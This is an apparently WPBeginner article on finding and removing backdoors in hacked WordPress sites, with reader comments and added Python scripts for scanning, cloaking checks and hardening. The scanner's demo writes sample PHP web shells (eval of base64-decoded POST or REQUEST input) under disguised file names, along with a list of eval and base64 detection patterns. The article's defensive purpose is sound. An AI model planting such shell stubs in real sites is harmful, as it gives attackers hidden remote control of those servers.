
How to Find a Backdoor in a Hacked WordPress Site and Fix It


Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site once, and the hacker got back in anyway. This happens when the cleanup was incomplete, or when you did not know what you were looking for. In most of the cases we saw, the hacker had left behind a backdoor that let them bypass normal authentication. In this article, we will show you how to find a backdoor in a hacked WordPress site and fix it.

What is a Backdoor?

A backdoor is a method of bypassing normal authentication to gain remote access to the server while remaining undetected. Smart hackers upload a backdoor as the very first thing they do, because it lets them regain access even after you find and remove the exploited plugin. Backdoors often survive upgrades, so your site stays vulnerable until you clean this mess up.

Some backdoors simply let the attacker create a hidden admin user. More complex ones let the hacker execute any PHP code sent from the browser. Others have a full-fledged UI that lets them send email from your server, run SQL queries, and do anything else they want.

[Screenshot: a backdoor's web interface]

Where is this Code Hidden?

Backdoors on a WordPress install are most commonly stored in the following locations:

  1. Themes – It is most likely not in the theme you are currently using. Hackers want the code to survive core updates, so if you have the old Kubrick theme, or any other inactive theme, sitting in your themes directory, the code will probably be in there. This is why we recommend deleting all inactive themes.
  2. Plugins – Plugins are a great hiding place for three reasons. One, people don't really look at them. Two, people are slow to update their plugins, so injected code survives for a long time. Three, some poorly coded plugins have vulnerabilities of their own to begin with.
  3. Uploads Directory – As a blogger, you never check your uploads directory. Why would you? You upload an image and use it in your post. You probably have thousands of images in the uploads folder, divided by year and month. It is very easy for a hacker to drop a backdoor in the uploads folder, because it hides among thousands of media files that you never look at. Most folks don't have a monitoring plugin like Sucuri. Lastly, the uploads directory has to be writable by the web server for uploads to work at all, which makes it a great target. A lot of the backdoors we find are in there.
  4. wp-config.php – This is also one of the files hackers target most. It is also one of the first places most folks are told to look.
  5. Includes Folder – The /wp-includes/ folder is another place where we find backdoors. Some hackers always leave more than one backdoor file: once they upload one, they add another as a backup to ensure their access. The includes folder is another place most people don't bother looking.

In every case we found, the backdoor was disguised to look like a WordPress file.

For example: on one site we cleaned up, the backdoor was in the wp-includes folder and was called wp-user.php (this file does not exist in a normal install). There is a user.php, but no wp-user.php, in /wp-includes/. In another instance, we found a PHP file named hello.php in the uploads folder. It was disguised as the Hello Dolly plugin. But why on earth would that be in the uploads folder? D'oh.

It can also use names like wp-content.old.tmp, data.php, php5.php, or something of that sort. A file doesn't have to end in .php just because it contains PHP code; it can even be named .zip. (A file like that only runs if the server is configured to execute that extension or another PHP file includes it, which is exactly what the attacker's loader does.) In most cases the payload is base64-encoded and, once decoded, performs all sorts of operations (adding spam links, adding extra pages, redirecting the main site to spammy pages, etc.).

Now you are probably thinking that WordPress is insecure because it allows backdoors. You are DEAD WRONG. A WordPress core that is kept up to date is rarely the entry point. Backdoors are not the first step of a hack; they are usually the second. Most often the hacker finds an exploit in a third-party plugin or script that lets them upload the backdoor (hint: the TimThumb hack). It can be all sorts of things, though. A poorly coded plugin may allow privilege escalation: if your site has open registration, the hacker simply registers for free, exploits that one feature to gain more privileges, and then uses those privileges to upload files. In other cases your credentials were compromised, or you were using a bad hosting provider. See our recommended list of web hosting.

How to Find and Clean the Backdoor?

Now that you know what a backdoor is and where it can be found, you need to start looking for it. Cleaning it up is as easy as deleting the file or the code; the hard part is finding it. You can start with one of the malware scanner plugins for WordPress. Of those, we recommend Sucuri (yes, it is paid).

You can also use the Exploit Scanner plugin, but remember that base64 and eval are used legitimately in plugins too, so it will return a lot of false positives. If you did not write the plugins yourself, it is really hard to tell which code is out of place among thousands of lines. The surest thing you can do is delete your plugins directory and reinstall every plugin from scratch from its official source. (Comparing each plugin file against a freshly downloaded copy of the same version works too, since any difference is a lead.) Yup, unless you have a lot of time to spend, this is the only way to be certain.

Search the Uploads Directory

One of the scanner plugins will find rogue files in the uploads folder. But if you are comfortable with SSH, you only need to run the following command from your WordPress root directory:

find wp-content/uploads -type f \( -iname "*.php" -o -iname "*.phtml" -o -iname "*.php5" \) -print

There is no good reason for a .php file to be in your uploads folder; that folder is meant for media files. If there is a .php file in there, it needs to go. The same applies to .phtml, .php5 and similar extensions that the server may execute as PHP, which is why the command above checks for them as well.

Delete Inactive Themes

As mentioned above, inactive themes are often targeted. The best thing to do is delete them (yup, this includes the default and classic themes, as long as they are not in use). But wait, I didn't check whether the backdoor was in there! If it was, it is gone now. You saved yourself the time of looking, and you eliminated an extra point of attack.

.htaccess File

Sometimes the redirect code is added here. Just delete the file, and WordPress will recreate it. If it doesn't, go to Settings » Permalinks in your WordPress admin panel and click the Save button; that regenerates the .htaccess file. Keep a copy of the old file first if it contained custom rules you need, and read those rules before adding them back. Also look for .htaccess files inside subdirectories such as uploads: attackers add them there to make the server execute files with non-PHP extensions.

wp-config.php file

Compare this file with the default wp-config-sample.php that ships with WordPress. Anything that is out of place (an extra include, an eval, a base64 blob) needs to go. While you are in there, change the database password and regenerate the secret keys and salts, because the attacker has almost certainly read this file.
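If you are comfortable with a little scripting, the checks above (PHP files in uploads, PHP hiding under another extension, eval/base64 density in themes, plugins and wp-includes) can be run in a single pass. The script below is an added example written for this article, not code from WPBeginner or WordPress. It assumes the standard WordPress layout and the usual Apache handler extensions, scores files with the same kind of eval/base64 indicators the Exploit Scanner looks for (so expect the same kind of false positives), and builds a small constructed sample install in a temporary directory so you can see what a hit looks like before pointing it at a real site.

```python
"""Scan a WordPress tree for the hiding places described in this article.

Added example (not WPBeginner's or WordPress's code). Assumptions: the standard
layout (wp-content/uploads, wp-content/themes, wp-content/plugins, wp-includes)
and the extensions a typical Apache/PHP setup executes.
"""
import os
import tempfile

# Assumption: extensions the web server hands to PHP; check your AddHandler rules.
EXECUTABLE_EXT = {".php", ".phtml", ".php3", ".php5", ".php7", ".phar"}

# Weighted indicators of obfuscated or remote-controlled code. Legitimate
# plugins use some of these too, so a hit is a lead to review, not a verdict.
SUSPICIOUS = [
    ("eval(", 3), ("create_function(", 3),
    ("gzinflate(", 2), ("base64_decode(", 2), ("str_rot13(", 2),
    ("move_uploaded_file(", 2),
    ("$_REQUEST[", 1), ("$_POST[", 1), ("$_GET[", 1),
]
FLAG_SCORE = 4  # assumption: raise it if your plugin set is noisy


def score_php(text):
    """Total weight of suspicious calls present in a piece of PHP source."""
    return sum(weight for needle, weight in SUSPICIOUS if needle in text)


def scan_tree(root):
    """Walk an install; return [(relative_path, reason, score), ...] by score."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            in_uploads = rel.startswith("wp-content/uploads/")
            if in_uploads and ext in EXECUTABLE_EXT:
                # Rule 1: nothing executable belongs under uploads, whatever its name.
                findings.append((rel, "executable file in uploads", 10))
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            if "<?php" not in text and "<?=" not in text:
                continue  # not PHP source (images, CSS, real archives)
            if ext not in EXECUTABLE_EXT:
                # Rule 2: PHP code under a .tmp/.zip/.txt name is waiting for a loader.
                findings.append((rel, "PHP source under non-PHP extension", 8))
            score = score_php(text)
            if score >= FLAG_SCORE:
                # Rule 3: eval/base64/gzinflate density typical of a web shell.
                findings.append((rel, "obfuscation/remote-exec pattern", score))
    return sorted(findings, key=lambda f: -f[2])


def _write(root, rel, text):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Build a constructed sample install (not a real compromise) and scan it."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    # Clean files: a core file, a plugin that legitimately decodes an icon, an image.
    _write(root, "wp-includes/user.php", "<?php\nfunction get_userdata($id) { return null; }\n")
    _write(root, "wp-content/plugins/legit/legit.php",
           "<?php\n/* Plugin Name: Legit Icon */\n"
           "function legit_icon() { return base64_decode('iVBORw0KGgo='); }\n")
    _write(root, "wp-content/uploads/2013/05/photo.jpg", "not really a jpeg, just sample bytes")
    # Constructed backdoors mirroring the names the article mentions.
    _write(root, "wp-includes/wp-user.php",
           "<?php\nif (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }\n")
    _write(root, "wp-content/uploads/hello.php",
           "<?php\n/* Plugin Name: Hello Dolly */\n@eval(gzinflate(base64_decode($_REQUEST['x'])));\n")
    _write(root, "wp-content/uploads/2013/05/wp-content.old.tmp",
           "<?php\n$f = create_function('', base64_decode($_GET['p'])); $f();\n")
    _write(root, "wp-content/themes/kubrick/footer.php",
           "<?php\necho '</body>';\neval(gzinflate(base64_decode('c0tNLs4v')));\n")
    return scan_tree(root)


if __name__ == "__main__":
    for rel, reason, score in demo():
        print(f"{score:>3}  {rel:<48} {reason}")
```

To scan a real install, call scan_tree('/path/to/wordpress') instead of demo(). A hit on a plugin file is a reason to diff it against a fresh copy of the same plugin version, not proof of compromise; a hit under uploads is.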

Database Scan for Exploits and SPAM

A smart hacker never relies on just one hiding place; they create several. Targeting the database is an easy trick: they can store malicious PHP, new administrator accounts, spam links and more in there. Sometimes you won't even see the extra admin user on your Users page: the count says 3 users, but only 2 are listed. Chances are you are hacked.

If you are not comfortable with SQL, let one of the scanners do the work for you. The Exploit Scanner plugin and Sucuri (paid version) both take care of that.

Think you have cleaned it? Think again!

Alright, so the hack is gone. Phew. Hold on, don't relax just yet. Open your site in an incognito window to see whether the hack comes back. Sometimes these hackers are smart: they hide the hack from logged-in users, so only logged-out visitors see it. Better yet, set your browser's user agent to Google's crawler, because sometimes the hackers only want to target the search engines. If everything looks clean from all of these angles, you are good to go.

Just FYI: if you want to be 100% sure there is no hack, delete the site and restore it from a backup taken at a point where you know the hack wasn't there. This may not be an option for everyone, so the rest of us have to live on the edge. Keep in mind that restoring files does not close the hole the attacker came through; update or remove the vulnerable plugin, script or account as well, or the hack simply comes back.
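A script version of the incognito and Googlebot checks, added here as an example rather than code from the article: it fetches the same page under several user agents and lists the lines that only some visitors receive. The user agent strings are assumptions (update them to current browser and crawler strings); demo() uses a constructed fake server response so it runs offline, while http_fetch() does the real request and sends no cookies, so it is already the logged-out view.

```python
"""Fetch one page as several clients and report content only some of them get.

Added example, not the article's code. USER_AGENTS are assumptions; demo()
uses a constructed fake fetcher, http_fetch() performs the real request.
"""
import urllib.request

USER_AGENTS = {
    "browser": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/120.0 Safari/537.36",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "bingbot": "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "curl": "curl/8.4.0",
}


def http_fetch(url, user_agent):
    """Real fetch. No cookie jar, so the server sees a logged-out visitor."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent, "Accept": "text/html"})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", errors="replace")


def fetch_variants(url, fetch=http_fetch):
    """Return {variant_name: response_body} for every user agent."""
    return {name: fetch(url, ua) for name, ua in USER_AGENTS.items()}


def find_cloaked_lines(variants, baseline="browser"):
    """Lines a variant receives that the baseline (normal browser) does not."""
    base = set(variants[baseline].splitlines())
    cloaked = {}
    for name, body in variants.items():
        if name == baseline:
            continue
        extra = [line for line in body.splitlines() if line.strip() and line not in base]
        if extra:
            cloaked[name] = extra
    return cloaked


# Constructed responses standing in for a site that cloaks spam for crawlers.
CLEAN_PAGE = (
    "<html>\n<head><title>My Blog</title></head>\n<body>\n"
    "<h1>My Blog</h1>\n<p>Welcome back.</p>\n</body>\n</html>\n"
)
SPAM = '<div style="display:none"><a href="http://example.invalid/pills">cheap pills</a></div>'


def fake_fetch(url, user_agent):
    if "Googlebot" in user_agent or "bingbot" in user_agent:
        return CLEAN_PAGE.replace("</body>", SPAM + "\n</body>")
    return CLEAN_PAGE


def demo():
    return find_cloaked_lines(fetch_variants("http://blog.example.invalid/", fake_fetch))


if __name__ == "__main__":
    for variant, lines in demo().items():
        print(f"only {variant} sees:")
        for line in lines:
            print("   ", line)
```

Pages with nonces, timestamps or rotating ads will show a few differing lines in every variant; what you are looking for is markup that appears only for the crawlers: hidden divs, script or iframe tags, links to domains you do not own.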

How to Prevent Hacks in the Future?

Our #1 advice is to keep good backups (VaultPress or BackupBuddy) and start using a monitoring service. Like we said earlier, you cannot possibly watch everything that happens on your site while you are doing a ton of other things. This is why we use Sucuri. It might sound like we are promoting them, but we are not. Yes, we do get an affiliate commission from everyone who signs up for Sucuri, but that is not why we recommend it. We only recommend products that we use and that are good. Major publications like CNN, USA Today, PC World, TechCrunch, The Next Web and others also recommend these guys, because they are good at what they do.

Read our article on 5 Reasons Why We Use Sucuri to Improve our WordPress Security

Few other things you can do:

  1. Use Strong Passwords – Force strong passwords on your users, and start using a password manager like 1Password.
  2. 2-Step Authentication – If your password is compromised, the attacker still needs the verification code from your phone.
  3. Limit Login Attempts – This plugin locks a user out after X failed login attempts.
  4. Disable Theme and Plugin Editors – Setting DISALLOW_FILE_EDIT in wp-config.php removes the built-in file editor, so even a user whose privileges were escalated cannot modify your theme or plugins through WP-Admin.
  5. Password Protect WP-Admin – You can password protect the entire directory at the web server level, and you can also limit access by IP address.
  6. Disable PHP Execution in Certain WordPress Directories – Block PHP execution in the uploads directory and any other directory of your choice, so that even if someone manages to upload a file there, the server will not run it.
  7. Stay UPDATED – Run the latest version of WordPress, and keep your plugins and themes updated.
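Items 4 and 6 are the two that come down to a few lines of configuration. The script below checks for both and applies them; it is an added example, not code from the article or from WordPress, and assumes Apache with .htaccess overrides enabled (nginx ignores .htaccess, so there you add an equivalent location block to the server config instead). demo() builds a constructed install in a temporary directory and shows the audit result before and after.

```python
"""Audit and apply two hardening steps: DISALLOW_FILE_EDIT in wp-config.php
and a deny rule for PHP-like files under wp-content/uploads.

Added example (not the article's or WordPress's code). Assumptions: Apache 2.4
with AllowOverride enabled so .htaccess is honoured (nginx ignores it), and a
wp-config.php that still carries the stock "stop editing" marker.
"""
import os
import re
import tempfile

# Weak state: no .htaccess in uploads, so an uploaded shell.php simply runs.
# Corrected state: the server refuses to serve anything PHP-like from there.
UPLOADS_HTACCESS = """# Deny direct requests for PHP-like files under uploads (Apache 2.4 syntax;
# on Apache 2.2 use "Order deny,allow" and "Deny from all" instead).
<FilesMatch "\\.(php|phtml|php3|php5|php7|phar)$">
    Require all denied
</FilesMatch>
"""

FILE_EDIT_DEFINE = "define( 'DISALLOW_FILE_EDIT', true );\n"
STOP_MARKER = "/* That's all, stop editing!"


def _read(path):
    if not os.path.exists(path):
        return ""
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def audit(root):
    """Return the list of missing controls (empty list means both are in place)."""
    missing = []
    cfg = _read(os.path.join(root, "wp-config.php"))
    if not re.search(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", cfg):
        missing.append("DISALLOW_FILE_EDIT is not set: the theme/plugin editor is enabled")
    ht = _read(os.path.join(root, "wp-content", "uploads", ".htaccess"))
    if not re.search(r"<FilesMatch[^>]*php[^>]*>.*?(Require all denied|Deny from all).*?</FilesMatch>",
                     ht, re.S | re.I):
        missing.append("wp-content/uploads/.htaccess does not block PHP execution")
    return missing


def harden(root):
    """Apply both controls. Safe to run more than once."""
    cfg_path = os.path.join(root, "wp-config.php")
    cfg = _read(cfg_path)
    if "DISALLOW_FILE_EDIT" not in cfg:
        # The define must precede the wp-settings.php require, so insert it ahead
        # of the stock marker (or the require line) instead of appending at the end.
        for anchor in (STOP_MARKER, "require_once"):
            idx = cfg.find(anchor)
            if idx != -1:
                cfg = cfg[:idx] + FILE_EDIT_DEFINE + "\n" + cfg[idx:]
                break
        else:
            cfg += "\n" + FILE_EDIT_DEFINE
        _write(cfg_path, cfg)
    ht_path = os.path.join(root, "wp-content", "uploads", ".htaccess")
    if "FilesMatch" not in _read(ht_path):
        _write(ht_path, _read(ht_path) + UPLOADS_HTACCESS)


def demo():
    """Constructed install in a temp dir: audit, harden twice, audit again."""
    root = tempfile.mkdtemp(prefix="wp-harden-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    _write(os.path.join(root, "wp-config.php"),
           "<?php\ndefine( 'DB_NAME', 'wp' );\n\n"
           "/* That's all, stop editing! Happy blogging. */\n"
           "require_once ABSPATH . 'wp-settings.php';\n")
    before = audit(root)
    harden(root)
    harden(root)  # second run must be a no-op
    after = audit(root)
    return before, after, _read(os.path.join(root, "wp-config.php"))


if __name__ == "__main__":
    before, after, _cfg = demo()
    print("before:", before)
    print("after: ", after)
```

Neither control replaces the cleanup above: a backdoor that is already on disk still has to be found and removed, and a planted admin account can still upload a plugin through the normal installer unless DISALLOW_FILE_MODS is set as well, which also blocks legitimate updates and is a trade-off for you to weigh.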

Lastly, don't be cheap when it comes to security. We always say that the best security measure is a great backup. Please, please, please keep good regular backups of your site. Most hosting companies DO NOT do this for you. Start using a reliable solution like BackupBuddy or VaultPress, so that if you ever get hacked you always have a restore point. Also, if you can, just get Sucuri and save yourself all the trouble: they will monitor your site and clean it up if you ever get hacked. It comes out to about $3 per month per site on the 5-site plan.

We hope that this article helped you. Feel free to leave a comment below if you have something to add :)


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

  • Michael

    Great Post, still relevant. I got malware the other day and downloaded my site to my computer. I sorted the files by “last modified” which showed me the pages that had been compromised.

    I compared these files with backup files and was able to track down the malware!

  • Azman

    Nice post. I recently ran Exploit Scanner and it found many malicious or suspicious codes on my site, like eval and base64_decode. What should I do in this case? Do I need to set up my whole database from the start? I can do this because my site is not full of content.
    But I am not very familiar with PHP, so help me.

    • WPBeginner Support (http://www.wpbeginner.com/)

      Exploit Scanner lets you know where it found the malicious code. If it is in a theme or plugin file, then you can simply delete those theme and plugin files. After that you can download and upload fresh copies of those files to your site. If it is in the database and you can start fresh, then do that. Otherwise there are ways to clean the code from the database too.

  • Dionisis Karampinis

    Very nice article, many thanks! I have used Exploit Scanner and currently I'm using BPS Security.

  • Matthew Baya

    Nice article. I've found that on infected WP sites they consistently seem to put a file named https.php in the wp-includes folder. I also found on my shared hosting server that they will hop from one infected account to find other world-readable wp-config.php files in other WP installs and use the database information there to create admin accounts on those installs. Thus I'd add that anyone who's been hacked should change their database credentials and also lock down wp-config.php as much as possible, ideally so that only the web server user (and the owner) can access it.

    I've been using Wordfence to clean infected sites and have been very happy with it, though I recently found it's no longer noticing the /wp-includes/https.php file I mentioned earlier. I've contacted them about this since I know in the past it did notice these.

    • Nora McDougall-Collins

      A recent infection I had to deal with infected all the index.php files.

  • qammar

    Very helpful and informative article.

    One of my client's websites/blogs was infected with malware and was reported as an "attack page" by Google. First I tried the Sucuri SiteCheck tool to identify the infected files/badware, but it only showed this scan result:

    web site: blog.myclientwebsite.com/
    status: Site blacklisted, malware not identified
    web trust: Site blacklisted.

    This did not help at all, as we already knew the site was blacklisted. So I scanned all the data on the domain and found the following two files infected:

    wp-includes\js\js\cnn.php
    wp-includes\js\js\rconfig.php

    I am posting this for other people to look for these files, if their website is infected and reported as attack page.

    Cheers,
    qammar feroz

    • Editorial Staff (http://www.wpbeginner.com)

      The free Sucuri scanner doesn't do server-side scanning. If you actually pay for Sucuri, not only does it protect you, but they will do the cleanup for you if anything happens.

  • Nora McDougall-Collins

    Thanks for the excellent article! I have passed it along to my web development students through Facebook!

    Also, one of my students' sites was hacked and shut down by the web host for the second time. It looks like he had been doing his database backups. So, it looks like we will have to copy and paste his posts directly into the Dashboard from the database dump. What fun!

    • Nora McDougall-Collins

      Sorry for the incomplete information – he had NOT been doing database backups. So, we will have to dump the database and copy and paste into the new install.

  • Patricio Proaño

    Excellent! Thanks for the info, very useful!!

  • Pat Fortino

    You don't have to pay Sucuri anything to scan your site. You can scan as many sites as you want for free. That scan will tell you where the hacks are.

    • Editorial Staff (http://www.wpbeginner.com)

      Not quite correct. Yes, they have a free scanner, but it only checks whether the hacks have a front-end impact. For example, it will say that you have malware injections in your front-end, but it will NOT tell you where the backdoor is hiding and such. There are times when you clean up the hack's results but the backdoor stays even after the cleanup. Then, when it comes back, you are left wondering why.

  • Andrew

    Nice guide. Have you looked at Wordfence (http://www.wordfence.com/)? I’ve put a lot of customers on to it and they rave about it.

    Cheers,

    Andrew

    • Editorial Staff (http://www.wpbeginner.com)

      Never needed to try it. Sucuri is highly recommended by many big brands. Having used them for a while, we can say that they are very good.

    • Gautam Doddmani

      Thanks, I am already using the plugin; eliminated many plugins because of it. Real-time scans are great and so is its firewall :)

  • Harry Candelario

    This was EXACTLY what I needed!! I've been trying to figure out how a hacker kept getting into one of the sites I maintain... it was just this one site, none of my other sites were being hacked. I found it with your help. It was hiding in a Pinterest plugin.
    Thanks again.